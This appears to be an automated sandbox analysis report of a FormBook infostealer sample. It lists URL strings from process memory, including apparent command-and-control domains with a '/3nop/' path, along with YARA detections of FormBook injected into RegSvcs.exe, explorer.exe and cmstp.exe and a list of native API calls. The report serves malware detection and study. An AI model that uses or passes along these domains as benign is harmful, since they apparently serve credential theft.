Source: explorer.exe, 0000000A.00000003.2274681354.000000000C55B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2560231684.000000000C5A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271281056.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2273955593.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279068395.000000000C59E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.subur88wap.sbs/3nop/
Source: explorer.exe, 0000000A.00000003.2274681354.000000000C55B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2560231684.000000000C5A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271281056.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2273955593.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279068395.000000000C59E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.subur88wap.sbs/3nop/www.ok33r.shop
Source: explorer.exe, 0000000A.00000003.2274681354.000000000C55B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2560231684.000000000C5A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271281056.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2273955593.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279068395.000000000C59E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.subur88wap.sbsReferer:
Source: explorer.exe, 0000000A.00000003.2274681354.000000000C55B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2560231684.000000000C5A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271281056.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2273955593.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279068395.000000000C59E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thedronetechhub.shop
Source: explorer.exe, 0000000A.00000003.2274681354.000000000C55B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2560231684.000000000C5A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271281056.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2273955593.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279068395.000000000C59E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thedronetechhub.shop/3nop/
Source: explorer.exe, 0000000A.00000003.2274681354.000000000C55B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2560231684.000000000C5A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271281056.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2273955593.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279068395.000000000C59E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thedronetechhub.shop/3nop/www.xuq-smart-fridge-uj0.rest
Source: explorer.exe, 0000000A.00000003.2274681354.000000000C55B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2560231684.000000000C5A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271281056.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2273955593.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279068395.000000000C59E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thedronetechhub.shopReferer:
Source: explorer.exe, 0000000A.00000003.2274681354.000000000C55B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2560231684.000000000C5A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271281056.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2273955593.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279068395.000000000C59E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wck37.top
Source: explorer.exe, 0000000A.00000003.2274681354.000000000C55B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2560231684.000000000C5A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271281056.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2273955593.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279068395.000000000C59E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wck37.top/3nop/
Source: explorer.exe, 0000000A.00000003.2274681354.000000000C55B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2560231684.000000000C5A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271281056.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2273955593.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279068395.000000000C59E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wck37.top/3nop/www.sculptify.today
Source: explorer.exe, 0000000A.00000003.2274681354.000000000C55B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2560231684.000000000C5A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271281056.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2273955593.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279068395.000000000C59E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wck37.topReferer:
Source: explorer.exe, 0000000A.00000003.2274681354.000000000C55B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2560231684.000000000C5A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271281056.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2273955593.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279068395.000000000C59E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xuq-smart-fridge-uj0.rest
Source: explorer.exe, 0000000A.00000003.2274681354.000000000C55B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2560231684.000000000C5A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271281056.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2273955593.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279068395.000000000C59E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xuq-smart-fridge-uj0.rest/3nop/
Source: explorer.exe, 0000000A.00000003.2274681354.000000000C55B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2560231684.000000000C5A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271281056.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2273955593.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279068395.000000000C59E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xuq-smart-fridge-uj0.rest/3nop/www.amtrade.icu
Source: explorer.exe, 0000000A.00000003.2274681354.000000000C55B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2560231684.000000000C5A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271281056.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2273955593.000000000C51A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279068395.000000000C59E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xuq-smart-fridge-uj0.restReferer:
Source: explorer.exe, 0000000A.00000000.1326522218.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 0000000A.00000000.1326522218.000000000913F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000000A.00000000.1326522218.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279552039.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2551526353.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000A.00000000.1326522218.0000000008DA6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000A.00000000.1326522218.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279552039.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2551526353.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000000A.00000002.2548450534.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
Source: explorer.exe, 0000000A.00000002.2548450534.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000A.00000000.1326522218.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2551526353.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279552039.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 0000000A.00000002.2548450534.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 0000000A.00000002.2548450534.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 0000000A.00000002.2548450534.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 0000000A.00000002.2548450534.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: explorer.exe, 0000000A.00000002.2556662444.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1331955785.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 0000000A.00000002.2548450534.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 0000000A.00000002.2548450534.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 0000000A.00000002.2548450534.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 0000000A.00000002.2548450534.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
Source: explorer.exe, 0000000A.00000002.2548450534.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: explorer.exe, 0000000A.00000002.2556662444.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1331955785.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 0000000A.00000002.2556662444.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1331955785.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: explorer.exe, 0000000A.00000002.2548450534.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000A.00000002.2548450534.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000A.00000003.2278460473.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2552147774.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1326522218.00000000090F2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 0000000A.00000002.2556662444.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1331955785.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 0000000A.00000002.2548450534.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
Source: explorer.exe, 0000000A.00000002.2548450534.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 0000000A.00000002.2548450534.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 0000000A.00000002.2548450534.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 0000000A.00000002.2548450534.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
Source: explorer.exe, 0000000A.00000002.2548450534.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 0000000A.00000002.2548450534.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
Source: explorer.exe, 0000000A.00000002.2548450534.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 0000000A.00000002.2548450534.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 0000000A.00000002.2548450534.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 0000000A.00000002.2548450534.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
Source: explorer.exe, 0000000A.00000002.2548450534.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 0000000A.00000002.2548450534.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1320841185.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 0000000A.00000000.1320841185.00000000071B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.pollensense.com/

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.1415492668.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1348081763.00000000047C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1384995064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1415492668.0000000004C8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1416948989.0000000002510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2544683855.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2545503031.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2545426504.00000000036F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.1415492668.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.1415492668.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.1415492668.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.1348081763.00000000047C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1348081763.00000000047C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.1348081763.00000000047C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1384995064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.1384995064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.1384995064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.1415492668.0000000004C8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.1415492668.0000000004C8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.1415492668.0000000004C8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.1416948989.0000000002510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.1416948989.0000000002510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.1416948989.0000000002510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.2544683855.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2544683855.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.2544683855.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.2545503031.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2545503031.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.2545503031.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.2562036289.0000000010545000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 0000000D.00000002.2545426504.00000000036F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2545426504.00000000036F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.2545426504.00000000036F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: 890983726372673.exe PID: 3180, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7180, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: mZanCtInfW.exe PID: 7364, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: explorer.exe PID: 7452, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: cmstp.exe PID: 7588, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041A320 NtCreateFile,	9_2_0041A320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041A3D0 NtReadFile,	9_2_0041A3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041A450 NtClose,	9_2_0041A450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041A500 NtAllocateVirtualMemory,	9_2_0041A500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041A31C NtCreateFile,	9_2_0041A31C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041A4FB NtAllocateVirtualMemory,	9_2_0041A4FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_01952BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952B60 NtClose,LdrInitializeThunk,	9_2_01952B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952AD0 NtReadFile,LdrInitializeThunk,	9_2_01952AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952DD0 NtDelayExecution,LdrInitializeThunk,	9_2_01952DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952DF0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_01952DF0
